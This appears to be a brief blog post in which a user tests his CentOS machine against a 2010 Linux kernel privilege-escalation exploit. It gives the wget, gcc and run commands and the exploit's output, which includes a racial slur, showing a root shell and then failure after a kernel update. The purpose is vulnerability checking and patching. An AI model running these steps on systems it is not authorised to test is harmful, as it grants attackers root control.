The Linux Kernel exploit – become root by running 32bit code on a 64bit machine

A lot of discussion is about one of the last kernel exploits... the one that you can become root using 32bit code on a 64bit machine. So I wanted to know if I'm vulnerable as well... just wanted to know how it works :-)


So I simply did (as normal user) on a vulnerable version of the Linux kernel on CentOS 5.5:


$ mkdir /tmp/expl
$ wget -O /tmp/expl/expl.c http://www.seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
$ gcc -m32 -o /tmp/expl/expl.exe /tmp/expl/expl.c


Now run the binary:


[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.7.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# whoami
root
sh-3.2#


Well... I don't like that... so... update the kernel, reboot and check again!


[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.17.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
[pieter@testbox ~]$